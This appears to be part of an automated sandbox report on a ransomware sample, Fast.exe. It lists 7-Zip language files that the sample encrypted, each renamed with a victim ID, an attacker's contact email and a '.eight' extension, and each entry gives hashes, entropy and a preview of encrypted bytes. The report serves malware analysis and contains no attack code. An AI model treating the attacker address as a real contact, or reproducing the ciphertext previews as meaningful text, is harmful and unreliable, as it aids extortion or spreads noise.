    Preview:......K(y...W...:....9.|.4.).(..L7.A...P........s!7..r..?D!.%...F%!C...4~.[...s`..8..ej.v_q.|{4X....g....c..f...G..`..Snm.1w.a.Hw.B.G...u.Q.|.F?+....Y....H..d....,"%._....1......]..O......)tq}>.j^.......C.e..'.$...Y.I.W.pO..5..D...wP.MXD..I.......'..}......7...(...u.{7...#..[...N.....XT.P.T.h.L..K.f`mN......%6...2m`.$.Z..F..{...+...8.....(C./.Lrva..u.....z6.... .l..Z....E...+...d..<.,\)......Q..-r;*|..?...:$..;...p..3..-...B...-]....r..lV..4:..j...F..M....8....B.:@n.1.Y.U.X}bi)..........>..."....6......\O...8$....F..<#...q0:..2....)d)~.F.t.>!..=>_....k/.k`V.....^d..W.Q.j.I..B.AO.2..U[.......).6..0dV....[v..f:..$.P...w.X..\.3J>p...X....y.ox..s....c......H.....*@...$..g.^pR..#_.....@..Qw`7.v.....zH.Z8|....1}...q8...3H.c...&.*..._.k...L....\.gMhD....L*.D.-o....0X.."..D...F<.104.<LFJ..u..#.>F7...g..L.}pd ..8....c.i...^..`_.+..'.F>.i-..w=.s...^@..=.o.B..G+k.q.i!5....&|.=.....h.L.f..^...M....(...FL.'...;.e.j..4g.....aw...~9.....9.X.G.?....a...d.....<>...

    C:\Program Files\7-Zip\Lang\da.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8594
    Entropy (8bit):7.975452474798151
    Encrypted:false
    SSDEEP:192:ig1OakHk9RatDTHUThS19T8vv9ZTGx7bMq6GGWJY8sX8kuUA:igWHkOdgThs9TyZTGtbMq6GFJYpX8kuX
    MD5:1F83679AC5691741591674CE6EBB56BF
    SHA1:F409F9D8C665742093A2D1095CA5B3977C58C98F
    SHA-256:07A05518327B133928D9C46C3A95D7D713286315134DB72B8A4E079889F8D869
    SHA-512:EBEF462875B6BED353D55E8B459A19E736E31C93294F7D8A153E3CDA0DB27D92C1005CB1686D040D40D88D239273477AB8570837263AE844606FCF4749D98F5C
    Malicious:false
    Preview:.T5.].uC....*Z.....>..x.t..9..9..n...).L..l...$.._-...Y.h../..~....N..].|.z.l.];.....Z<..P.%.....ee........-........l.....>..|...o.....A......_.I..FW.. I..1f;MG........H..5.x.+.v...y`..3.c.K..0....(7..RF....w.U.edg..^.O......GK~W.......).7...)x..q...}..]1*...ou.h...1G.L.....;..].........%..c..Y.OWPb.Vk`........*..2!..!.....w...Q..?.._aR!..>...N....5.n.?....V|.B._..RV.&.'.. ..(..T".,t.2..<R|._.........q...a.nE.k....9._.G...SD..[*K.2.n....M6.q(xC>v.....4V.....7ANY..K+AI.#'P....y.t.....z|\}...@...d|..c..&....,...+.J].2F.....?.........pl.K...F......`...bc.t..D.....$.....wO.z.......<.tz.i..qi.........c.........1v.........C..?.7x....:........+...2......Z..}...`e.. .T"..7..L.).fVg...&..nK.z.I...=.........0.-.lj..2...>m.=6X..[5.....'O...J..eB..$..oeN.....Y..........m>5He+.u"a.G....e..T.A5...3._K...yI..)CB..S......*.hX.L..p..U..9..{.(.]..`#.4.8.k..x...U`w.vk...acAA.)3...#<H.{.7..|...@?..H.._...=.3...s...+.(.M.X..,.ujI.t..=.".w...@.G!Xv..A.v^.G.U

    C:\Program Files\7-Zip\Lang\de.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9794
    Entropy (8bit):7.981243426872218
    Encrypted:false
    SSDEEP:192:hW6S30BVN13AzsBwrf1QBuVl2QyuWOSI8iFKiJHaJ2uFTcytmVLPzHA:Y10Tw7f1QUVl2hLOSoHoZ9cytmlPjA
    MD5:8605BCEED95F81537D3D4D4E0858F475
    SHA1:DC5F25850A38F9DA3D567B1AED03F058BF0DC8A2
    SHA-256:DAF177C645F195C930FE550FDB65D247D523F9FB5D4EDA753151F28E49FD6199
    SHA-512:44BDFA970E5262791002D32F928DED2E0733CDADF3298A5083CF30F024EEDF46B3D5841EA8FD9C935F14DEC7C3750247AD424DB56A9DF972A623D58AB631406F
    Malicious:false
    Preview:....Y7).v+...+.e+J'.?.....8DG...P*^%.K..,..<@P....We.^.[/..?.V...X..OD...T.N..^2.L.;*%......s}##...Rf.*.D:......l..C..zj.QZF4.....';..*...D...i....V.T.l.....Q]......^..Su=.&.V.J..N../....B<Dth..Ul.Sh..>..x_...P..8n5.*.B..>m./v...1.....C.n..K.....w=M!_T.\...H.........2..p.>!..}......@r.=c=..md+.....`.5l^H?.T<~`.fYs..J.. .~.......m^.?-..].D..h*...bP'..3...V.Sz:V.#....U...v'..k.....o.N.q.C.jZL....iD.,{..,'..&..K.....Nz..r7....|..9[Q..3.3d...#.o=9n7.m...S-..!..s.l......{..G..RR...Z.V..K{.m.T.-..v/k.$....8`..UE....1p..2.7...j....z.\...0.....aG....G....x...e.&./.Wz..&(...K..Zf$...u.di....#..{m!..w..X..v.r..=..........~....A!..?.S..5.....DM$yK{^@..q..?x....H...A...;F.K.....k...a....63...2.a...%.....[.v3..>.LtKz...X.....'...c.>.).7..*.K.R.y..O.)j>.rckW.~Zl.....s.&.D.ho........d..[.E....[.2.`...sV.2.x.......iJ...>..P....;..).M..E/rWr.x.Z....Y.8xGm.s.9...}.2..:.Xf#..l....A. p F,.}....l.&]U`.g.g...R`.>,!...p..#.X.?:MT ...Z%M..=.9..Z.H.^.......5.....

    C:\Program Files\7-Zip\Lang\el.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):17138
    Entropy (8bit):7.988164364174954
    Encrypted:false
    SSDEEP:384:g8FqxNWRaETCPD+zvWtD5pOPEW6qORZ8nJSr9zDthiZfAWgBNA:g871+PDQuZ5QORenJSBGCbNA
    MD5:50FC599585AEA641B8DBF785C9E99A06
    SHA1:7C75683390B913CB71904364D29F030AC5F6A4E7
    SHA-256:50BF58980B6E73A096708FFC330223BD41B26255801537EA1598C046EE9200EB
    SHA-512:4B6DDED3DCA2B71D81DB9BB12184AE411F7759C7534BB78E7C53C837E5417C85158FA251951CAB4085A32A5E9D269E9ABE602C0CFF2500D73E9255B21F15DFB9
    Malicious:false
    Preview:...h.<.}.3..fh..*.v...u)9.D..;.....)..0.L...H.%a.I.Az.HLc7USu.....K.bt.6.t.eF...Sa.w...E0n....8.|l.......;..f. .By.)...`.S.I@{........8~..-..~.#.........kS7LN..od.y..c....?+^*...U....a.|.Y...h.1..-.W..f.A....36....Fs..'8.<.j_.G..]m.....w.... .G..0.J...e..J.)......`..;#.w..z..(w(...;.;.)Y|......(.B.c+..i..I....r?...^.....#b.....p..w.....e.>R.r.?.... ....$..........T..].l<J...SF#.7..A..WS.U..X.KZ.......9l...s...q...@..4..............6....Y./L;IW......w=`.^.Bq...bl...'.1.b.l....+NF6..0.cG..![.R).....=.8...........&*=u.@........s.....U..9.Q.ZS...M.. .I.....*.l..<W5......X.2]{.t..73&....G..U~...P.....T.!fa-..^H..k4yOipr.a....1.{.A..k.Qhn...N2...&rS...<....o.....k.W7.....te{.....41Na.6.....Y\.Z..=.;Y.r..\..@.:.x.6A..$3pe.....fo..(=..P5...5r...3..;W-"..>r...'..x|...!i.I...TS.X@.....^E.....e...._....(..3..j...E.F.a..;.s'b..['b.t9.k..J.H.Z....D.8..........r#.[.%..... ....6.......T.s..#.O`..).7.C."..L2h...c..5{...X.w...vy.'...s..Y.ed......t...a..e

    C:\Program Files\7-Zip\Lang\en.ttt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8146
    Entropy (8bit):7.980229942594748
    Encrypted:false
    SSDEEP:192:9p9mBk4au56chFsNFtiENSqjvfBdt9kLZgQ+zgb0uNJA:hmSrubhEfft9kVT0SA
    MD5:20FAC53D96B85C617A63526B8A2A8A1E
    SHA1:29528A82BC77353A465D7A1DCC6185CDA037E679
    SHA-256:8E7FCD237E4472640192817335E0562C4CCEA4718E268A5D7D0DC6CA8E4408AE
    SHA-512:53767EAAC7F56C73E395A45178EF3D198E383CDEE34079CEE3C1FFD5551B88EBBF80730F3B10CC762935D2D64C2B29E9C71D100F78508C4464A7A0221E2E8408
    Malicious:false
    Preview:..bO.....uKX.u.....H..3....._..ILs7PW...wa.S.@&.8he...$..bE...i..L..A..I+Ut......t.!R ....x...........6.o.d+.......c..g.e)U..K...S..$..z_..j;0ya..-UW...N..J...<....../..~L..\.j...i.<%=D..$....3...KXs=.].....$WG....F.3.@..D.N.r.y.ZVA..t...A]...+..o:.o*....w.<#.......S..o..q9P.b.kL...1.I..=..,..q.....G.?&.Gt@.}.g.....rD...D.8'>......F.........d......[z.Vh..........."....J..H9...iU>$...<.O.l...qI.>.B..$..R.'u..q..yq.V..u.1.6 }..7..........S-......,................H..k6.....[....:.....p.>:...l.R!.pA.....Y.r...V.L......F.Szb...A...}...-.q.%....2...O. ..].tH..?UO...gJ1\.*.S.DN.jc....9L...l.jkJ../.|(......qL K.;l.....sW....|.........Jh.,.....x..o.wS...%........C.r.........O\...]...Zp...H!f..G!.|...G..J|..n..i..1....f..6...6..."...?.N.j._...<<...]...q......Q.Pcl.LVv0L.Ao.&..5)W^..l'..?...-?..!W.K.hj...5.....s.;.H/...C.'....!5(..~...pS?.K.%F....JfJ9....j......k..M..{...=N.s.Ng.......a.i....'..]u..l\)........Q.........exxr).im...W..6l..n....8.

    C:\Program Files\7-Zip\Lang\eo.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):5490
    Entropy (8bit):7.963614284464779
    Encrypted:false
    SSDEEP:96:0WGQKdLULDZxGRej7e9wlWftRfImCCrq8cVpLKwmkqMik2aKLDUeaA:0W3LVgU7e9wcfzITyq86Awm7Mik2bkA
    MD5:95FFC0A9C6D38B4F7BA28DD620DAABEE
    SHA1:6369A5A391DD5838F9E7CD6593DACDC6008A9CCC
    SHA-256:67EDD223CE9F327153C3799175ADD2FF02BE86315F05D1A31471174CD48B47D8
    SHA-512:BEB54E30085E15F54913CF6D6234141769DF00A4798E456364ED15E1C6C8CC5574BFFCF3F034ED3134C34D94267848422DE6965E06A0F109E7539324BDE9A7E1
    Malicious:false
    Preview:'V.O..fc...q.I......o.C.Ias...\...O..:...(...!.+.F.....<.H'r.WAK....=.........l..@~#....K..<).$N5A.....I/f....b.......@.!.V..1.:'..-....;.9..i.p....;b..K.c..-...y.....L.G....K...E. .....V3s....~.8.+.E.u..Z....-.....S.ee......a...z.NSei........m.....-.7h\ :.<......*.l......\.M@qL...G.$^.._.....8.RxD..1i>...H2...^RnE..a..5......f.k~.Y....=-.--.+t*..p...&....Y.V..X...k.>dl9..H....`CI.8...r.D?.sP....K...$d..!.-..nHx..@......01..F.].p..D+..-gX.n..<.....z..8.R......M.ANg.Q..G."P%.....*.......7.4u/.CZ./..........).......#.S."6[i`Lo9M.............;..|.M._Xa.f..'T.Z8..y.....;.y.../.>>.l..Aa.~A.@.P..#?..A.4A...1.~8T.s.i..Nl2....v...f./rZt}..>...gkY...~...>..|.M.!.}..,D.~...Z&y..}i..9...Rg-...2~.E...D....%R.|.2..U..z@....w..3!..E.djS4[.(.".Q...[..q..KI.0.T.QK.s.8.9...f.<j.!T...J.4UG.....N;.....D..GC=f.F.vj.+.:Vy=.E.@.D....y.6.(...c...d%.W.].P...am...@l*.<....O.B.e.3../...5...F.v.......5K~..aW..c#.L.r.....^.4../;...ZR.x.?[..x.-.X.;...Tu....(R...|...(.

    C:\Program Files\7-Zip\Lang\es.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):10274
    Entropy (8bit):7.979052722796463
    Encrypted:false
    SSDEEP:192:PAgL5+5bV9dYEozXFOopf+JwIz/b6Hg8dhfnmFADFh8EGvcCA:4kwh6zXFlVyPMg8rfnmaSbvHA
    MD5:7A5996B82931D51E0801264EFCCE9D10
    SHA1:006B96B9C4808ECEC5C1F9012AA69EBD30057B5D
    SHA-256:57AABFBC90B7CCB14683D7542261186C306EB5C0DE40AEAC171D6DFCF681E1DF
    SHA-512:11AAD3EC70CDBD4A0E84B3FBB7A1C4FB0DE770662BD34B0079062B4E5721FB2C201E40515A94D9A07A18402DD58BF349D26BADD1A2357EB3AF2E41EDA7BA60CD
    Malicious:false
    Preview:.X....2i..`/. #.;2....T>.....h]......M5...:...d..RB.....:_[6.m....r((..w.).N.y..8C(..1/Y..y.?........xjznv8..<..............r.Q.&......;W9.[-.#.6E.q..*....G>Pg...#..&f.....a.....k.e6.W.................%t.PFB.RZ..=9s34h.1..].......,.0...../..#.......'.".....;....@.=........j..t..v...p.Q...}.^'..S.Q..5..%g.{.Qu...@G.v.Q"y.?.....<...C.......&jl&...x.D.g....f.......fL..|V.ri$.R.Q.PK..AF..n..b..............X.s..W"|;.c.bR.B...**..x.../uL.q. ..]..W.....~}w.b..8!..EF..?...g*.......C.)....`.P...}.h.........J......[.,.~........65N...R..!Wt9pK.."2..p.v.I...M.e.Z...."$.DKU..{..w>4.w..ZT-~.9.tEK..t..Q...D5....6N.7{..]X0.[..]...u..$..G.0..h...D_.X.w...W.!.#.(bL.3i..Y...^B.6..2.b.!.X.[...q..2c..2.m...|.......X[....Fc....=......Vq..>z_........in...F.....pH..7Zn...%.b..l......$m........;..aV.S.1....u.....XL7O.....f..M.](Rn(..=..~...#.....J>...a.p(............./...a....R.........N.5.r.<.O.C..U~2>....F.6%}`..;....D....R.fO.ESb.~.J..+.]h[.h...|5<Gq.........

    C:\Program Files\7-Zip\Lang\et.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):7298
    Entropy (8bit):7.972511181357166
    Encrypted:false
    SSDEEP:192:zQuZs/NWJcbQopK/h59EndIOP27HNZxy+8y5woI7HA:+af0yhodIh7tT0yqoOA
    MD5:A059C108D9A50AE8E1600A68230EC7E4
    SHA1:0F2F6A7D74C8CDB48142DE206C783FED3FD96370
    SHA-256:1D09493F2A8E09848301A287AB5F3D7BF1EAA3745A5C6E33030850908FAFA291
    SHA-512:8DEBD73EA62B091FD59581A187786CC1DC0D0EAF3633B938AB6B0F41F79FA2175D24507D54B198EC9776882A1BBC3810557DB0F73E6F1ECD62CDAB21EE855C7D
    Malicious:false
    Preview:vh5.=0.R!...L..y,|6.....p.k.+.J...........8.nFb.....9.8.......Y..u5.G5..t..."..l4 ..?*;y....:..W.|C."e..#...V..'..$d..~..pf.D.....V.Y.1..*.,q.sh.....Xv.[%........Q..-.Z.)...\..+O.....-..qL.q.;.........t..s.(...1..<.?~.*Rv..|..N.OH.,.T..t .....$.....I|.<...#.b|..pT..!!.!i..rU...:..{..4.Ho.+.q w=,....E..kz.!.s...q...e.m.-.%..fB.G...../..l.L.......9k/x..x"......C.3l.).rb.....,oq...0.}......)o....ttkf.D~n...JY.fe...D...rco.N.........4r.&.....4......VVz.@.6A..{.<.6..Q:*...:C..O`{s.1..D6uO....q.|FR.G....x..v.K.V......mY_..e..2L.UO..o...K...].....:p.0.x!..Y........H2....-.0*.8....."..h..c.5.i....U....fy,.....V.X.6..O.0m..Mok.......`....6w...i......Z...5aG..j.....=..Q}...ud.p.{../.A.....'.%.n%..Oc(.....G.yu...Q..,Y.z......N;..c8..u...0.WT."..[o...3?.<..<\lOo...}..l.j..tn..u..4...&..^.&.-.{W.oU..sf.D...|.#W.d....'.".... '.....4...$.<.....*8....&.oN...{.<0a.%....T..hb...~.....~.$...%..{HI..W$\..*(rO..xC....).e.36.5..;..P...`.k...f.g...\].s..(..T.....$s

    C:\Program Files\7-Zip\Lang\eu.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9122
    Entropy (8bit):7.977654082639977
    Encrypted:false
    SSDEEP:192:mu8pdCWhFGD1ZagtmTbhYMtdbMaNpgDi7qLxsISHB0A:mjjCH1ntmbhTfb74xs3h0A
    MD5:90776CD24C57F53C889E03D4B1BAC397
    SHA1:7E2E62D371299D1903E5BB1B18E5B01C3F3D6981
    SHA-256:BE971EF0DFD7E078A26EDEEE9BF09561D513182FD9DC2DE05BC235BB8EA5BF13
    SHA-512:9E0675932A6F9E579B1E739C8F9782E0738CB305CE525D09C018B3CD656414D52F0E6A5AFB23C4C8F41FA45C267EE238F9EC7A8C19C8E03C177823DE824EC14D
    Malicious:false
    Preview:0..2.X..H.......I.....{....bf.{$.I."...N<..h@.0A.c..}..*...N..$..w...g.X.....bM.O_lY..2. ..?*..5$.$Q......PV.. S.`.:~.TkeL.....*.d......F....+e6.#}....*.......U..v.."...<....a....C...1E.\..C.....&....FK...rBU0%..v.t......>......T.XiU.."K.d..\(.B&.,'B{(.`o.D..Xy^..._.U...%f. .2..c...c...,...a.....?.8S.Y9.c....wi?F.....^y]a.<.."....&\.{"J..Sq.H&.f".....U..vP...W.....;_d.u...\.R.N.@\LX&l...$..T.O.f.O.u..1.k..>e............VE....N?...k.w..t(.O.I&..._...C........).....+....,.5Z.R.u...|.........F.ch[.AVe5ih<..6.......a...*.:/..\.z.7...IRv,.a*.8d]...b."*.?.P.].su.{..4h..e.+..... ..#...........b*"g..&.p|..Q3.2>[.{oj..Bl.#.&.4.D#A.6.....iF7.u._........1E.N.'...t..B.S.x.7....Z...^..!..,.......X.lu.A..CB}.@..G..i.n..O...1.R...3....q.l.X..=.X....t/>E..<....>.<......R.?.6..q.......)A........<.jQ....<L.ME..........?.CF.,@.o......!..H...7p;!E}.TT2..V....l.{.gX._[b...m..M....7......m..*#~'n.`...Cgu...[...[!.E.7.-:.`3@.w.......~..EO.SeG....U3^..:...w|..(1...

    C:\Program Files\7-Zip\Lang\ext.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):7954
    Entropy (8bit):7.97481492670714
    Encrypted:false
    SSDEEP:192:HrWL+XyRvwLfYsHImHc02Se5D5XlZbZEZDRXe4IbA:LWL+Xywf5HImc7B5pzZEVRXe4IbA
    MD5:BCB4C065F031B0A432AA4B9DA6114C6F
    SHA1:580F471FFB0F168C141555D5300C424A227AD2FB
    SHA-256:9CAF57919A50DBA74C42FAF3C2857360D1E764F337819E829BA7B35521DDD7CF
    SHA-512:3E31D40C515DB67C2846E26FFAB56F4D70BA95D6C5AD9CE6B2F954EE5CF329822B33C900301256FD72992AA33B5A0124B65DEA8F85C28F69B2907E0256022834
    Malicious:false
    Preview:.3.w..2..'..|?.>....lu.."p... ...8/0.,.@.6..........n..N..B/....>CS,I.O-l>...g.nV....,..-`.P....?,..h...i*.:4)....t..Md.....#...n...d....*n..c.k..;...\...)~.?..Y..%......{..|.R.\..+.?^...#9E.k.L2...$G.W...S&.3.+i..XY7.(...f..Sx*8..TF.o....%..h...U...,.....W.L...zk:....*.'Q'p.T/.A.d6.......Z..z...8.A...4.mkX....)..".[.5.@.8..iP.!$=.js..,]YF...g..../.%.py.M...7M..K...rw..j..u..#..K......r..R.......z.F.uw...j)....%.`%%d....f...V..bO.me*.u;..&.o.....{.d.zJ.r?;v../.l.X......=...........p+4T...&...@.o..b.`..P.....4l...f..KX....z.;...f.,...s.7*.b.[w....9..:.......R|.....^p..\.s%u.&.0U./.6o..z....t..J.;.:L.H....R..A*b'..4.`e....}...<rIz.............-.d..1G.6.n"".sd.."....s3..'.7D.n.Q0..em....>.H....>J..0......\..............@.rkQ..r_t.L}KZ...,..cg.*...&....7.x.O..F?....../#..u.t.QB.....&y...^......^......J.3h@<|..*....l~x..{..RV.HT......t .1...J.o..3:!.H.....i...{......t.F>D..+.a.@P".......0.....k.?9....KNMuk.%t..#..;.y.......y.....r.

    C:\Program Files\7-Zip\Lang\fa.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):14034
    Entropy (8bit):7.985320642064902
    Encrypted:false
    SSDEEP:384:gd7HbFnnug9ch9/akGSsbpgW2c9T1dyqUqlA:PX9/vsbBNT1dyqUqlA
    MD5:A865555CA3DEA9D8C0D8AE28036878C1
    SHA1:30D8D06A14741766B3D515BDC6041A226B93C2AC
    SHA-256:B967100FBD4A78F2E700E2DA7AF23E6D1F47E5BBDD38B7FB71CB5D6517210B5C
    SHA-512:268C82208E91876C8FC3E76B89185A8192806FD38A2B2453D7EE0D31A0B9B6AD6506EF1DD804249F59773EC554E5C75AAE375F019B4609942B68ED1E4C69724F
    Malicious:false
    Preview:..i.fFq....<..{9...yb.j..W.-..aT.Xn....+.l.7..<....(.:...3.....se..A...x..0K..+....)b.k..@..~f$Z.*f...].p6....vb.(:pzk<5..=.J...8.A.jt..j..3d}...`.mDr.....)H...s.7d..j.p]Y.z..J\z.6....2......'.)..e......&...s&....ld.....{y........&....n.l]};....$....I`......`#...=.R .....K...~;.Prd.P.[..-.Hy......s...........{.D.s.....k..(...ku.3..3b..t....;.....e...*.I.|*2KR.u&..X%..)R*..<.......q)......V.......<.Do.....f....E..,.0 ..8...e..-...>.hW...Vy...FN._.\...N."4.'...1.,[.+&@.("X.........3.Dbg.d....?7@.(..n.&....h$9{>..QCn...r..v].C3w ........l.}R.*%F......:..0.gJ..G...._...U.......<.j..8..h..........n_.G...s...j...;......N..(...,..PX... v.^.BT...W..*i*...Z.+r.(.!0t....c....~e.........A4..t|..gH....jY_..m...|I..Q....iy59....B.2L.....X...X..e.k66v...'..\u.....H.......!....V,......WF{.U...._.0X...zt.J.i3.-]QC..R.[.6.e......Te.@O.oZ4..q.i...7S[.M.:n.J|....._..c.8...Z:=..i.[P.P....-< .....k.....:....o..0.....X..8ee....I:z.t1|.Q.n>..!.(..^...=m0b.j..

    C:\Program Files\7-Zip\Lang\fi.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9266
    Entropy (8bit):7.978718516175339
    Encrypted:false
    SSDEEP:192:NTAwdXFwo7Hdri+Dx3KPltcA5LveCgOC9d0tY/3dyEfNxVxLyBXo0A:51dHdr7xKdCA5LEsu3dbv4BTA
    MD5:A31391FA737104EA87C6F34E5F962431
    SHA1:1165A9CB9CBE7FF0E2B08133EE0DFC504B30AF2C
    SHA-256:A7006A94724776B4E4BADEC8D5D32D59FF43BF2C23C2BE194E64A8E2CF1693F8
    SHA-512:F7D7BE0AD30DBF86A64AAE7BAC3378B935FC03108CB6520AF3B4205FCC4C3F1282DF536B9CA9338B50A4EA273F85B3FCCC02321889E85C3D65A2EA6EDE008AD6
    Malicious:false
    Preview:.Y#E..FrI ........Bh....|.e..=......vw...-.].e.....!.N.=.<..7....K.=%.U._x..p+'.*r.....1.oEbR;..I.^..W7...t}.).F?.....(5c]..5.!.0..g...T......~....<D..P.....p....(....#.L.UY......bmB.;/)..._.)..k.+.W.......}Y..i..P.4.l..s^...Ch..:2....u..t...P.B.....,..`O.#=.t...|.U.VN.'@../...+/z. .K/2~>...D...*...s...f.`4...7.Ex.yT6.*.He3.6.?..eZ9c..iq....x..Be.tfp|=l[..9..R!.~|.%0.H.t...(v.7v.(...{K.j.]h.....z.....++^d...m.U.m...'R....n..c.:.s....8Ftsi...H..p3.L..,b3..."_h.L......o.(...N.Rx c.s...D-........fo.6.../......BO..S.}".d...3......]$v..K(..!....4.E.+l.F..&2..v....|..n..&..ww..K.d.i.Ayy$..r...=...Y}l.........s........?V{SZ..v".m..l2..C....!c.(....=....$4...o~L..JrG..d..j.qU...sN_.P...g.". .....E.F..........M.Buc.*5.-R..+3/.........C..&i...6.J.viV.2......p...2..G..$.V|.l.).&.b?.\.....8..t.V.l.g{X.r@.....:...2....&raN.=.;f.......+..Zw"...>..Tt&'......,d.6...E..@d..,l....#....s..`K...t.p#Qo|l....Ee.pE+.l.Z......i...vynuo"b..ZM.O...)xT.....UJ...G

    C:\Program Files\7-Zip\Lang\fr.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):10146
    Entropy (8bit):7.979764151880745
    Encrypted:false
    SSDEEP:192:PmbQPFbl7o5DCsWZ7jljY0bDcNM9u3nRvh5U3XLBdJ86lLsugy8eREA:+bMbA2hZ7jljY0bQq8wBdG61Pgy8HA
    MD5:BF2A174EFFCB36E8622D9E46777B6135
    SHA1:261444A4E062C318540C6715D8922C2C90C4739C
    SHA-256:C6E40A09160B2107D7D3878CA6C16D1ACC3B6BDB15FD4FC4A20E0027F9BE48E9
    SHA-512:A6293B390D4D57BE94277180263CE8C970F6054A4492085575038DA87BC27326A06F6481FA146439D362B72921790F268C76C02BEB6FB0A6831BBBF1119181A2
    Malicious:false
    Preview:X.?.A8.......S.....(...S.L....n.|^..d"(gs,YJ$...zh......_v.. .r.gu....P.9.C.....#.nMq...6g..V|m=-e2`.X.Gl/....zby.p..`.....D...t1.lIYi...T.]..#.`6.;....x.F.mk..l.@.p..2.tl.#8....u...K....m.k....T...y.l......5.wg.~..w...-....B...?|w:...;..!.............p4..dQ......}..#.G.yz..(\.D......J.g.....UC.A.x.c....y....+O....s.x.V.gv..3....X..|gU.O...4.E.5.N.a.`.Fp+.....a..B....j.<mj.|...d..mG..U.v.Z..tp.7$.....S:=.U"...@J.Ba..>......m..pz......v.R+..m!.=.h:]...Q..}.-...<~N3.....Nu/..^..y....`...@..3.......[..'.9p..<b^.!$B.!F.........IB)..7;...,-..O.A"S.*.m].....T..?OL..:y.M...Y...Wskv....%.-*#.4.a7%G~.t.h<.x ..:..].pnk.Dr..:....n_~..[.G5...'.J..1.F[z-@r..Z.........B).*tS......"...l..~.W.i.t.m..<.....{....N......+.wS.K.....n-..;.......0.....@_.....s....[3.UXf...&)...."c..L....Q.........k......d.nT./..j.(.e..2.3.tk#.A....lMP7.q<=.".[,..n.J.].=...Q.]<.s...1.2IX..?....6.D.}..P....T..fr.:.=..3#(.P.:......ZGq;....J...(.&.O.V:..c..@8...}..I..Xj..X...o$.B.Ip...x

    C:\Program Files\7-Zip\Lang\fur.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):7746
    Entropy (8bit):7.973326406364096
    Encrypted:false
    SSDEEP:192:Ve+l1z3ZQCZrsp502TZrgqRAeTSRkpZxHRoj8xM41A:l1jZQCZrsp502ZsxkVHRoAxM41A
    MD5:B01F2BFFEBA38691270B5CAE79F04D3E
    SHA1:AFC7781899C7D99791828FD20A663432A35F20E0
    SHA-256:C6E384829D51DB1EEC7DB07244DA9820B69D6B58C845EF1BE9D82F65DBA2FF21
    SHA-512:6DF26191A4865F5F57E306B5A6EFACC0283D4C7C9EA941F5C89F1614DE7FE498251B2EC1175B5C30A387B5850166E245B82DA87AC708079FD739ED299E6A29F7
    Malicious:false
    Preview:.Z..,....g..i.[=.....Q.7=c.[....X...hH..h.l.Gw.62.Oq..%......\...I........(,..}.1..-..^......}.8.g=T..&.,..........+......t.......KI.v.&fO.P..xu.s......<..U...?W.....E.h...g..d..N..i...w.}2*....{Qn......n..o.....:..vD....5o..9A8..b8\MbW3.-.d....'...Qi.....a.swt.*.n.....uAL{}].,...S.-.+...zW*s].......@A.GzK{C.]c.../..L[PnM......a*y3.n.!..%h.D.|.&....f.}9...b..J>.....|D..sEtSE`.'D.V.Ca!Zj.c,..3..K..%.....Sd:lKrrs....8..0..'@..K*y....aj.].:$m..>PP.A.'5....#..=..fmF..K"W...; c+*.._-....V...8.C....o....W%.....s.n..f.F.....09Q.]....[.a&6...4.[..#..o;..r0.lA.2..........n.!m..0El.28m....~....k..Eb.+.]...%T..?....&-.48.......g..".Z....zru..=.@_..^>..8.) .n.t..$.,..3W....lW....q.H.2.XoD...]..ZK.:_.kk...](.K..o.....T......v....D..y...7........Zv..pf.|....,d.B..k...V. ...]q/..^..?..ih.-...$../X.%^&V....a.a(.q...|.j..)....S.......L..g+.h......$em.{...KN.#...Y..U~.R.s.b..x.e..Q.~12..[o.y...4....H..mt.1)...$..o9h.Gr.Yc.S'.X......5.i/.7..s...~.=$..

    C:\Program Files\7-Zip\Lang\fy.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):6674
    Entropy (8bit):7.9747976731697525
    Encrypted:false
    SSDEEP:192:RxZAu9r0wtR6uZZfD5mMV647Ew2P3tgKg3aQ/wQ9VIa6BseH0OxHA:HbgwtRhBmMv6qh//tInseH9A
    MD5:87AC9AC6402FCA3E17947D608F450E93
    SHA1:66A716A22BE6476E5DD32C10A575174DE0EBE2F3
    SHA-256:86E789F16FEEE311551ECC3A5E8FAAD35DC95A557941EDD0582FEA48AAA24C65
    SHA-512:0996972F421F3439418DEBDBAB4F26BC2597DE3184EF5FD0EAD39A43201ADA5388134C10EA8DD33D4820C94D3B8C1A88043C318F03F3B8FC57A5225800B087E5
    Malicious:false
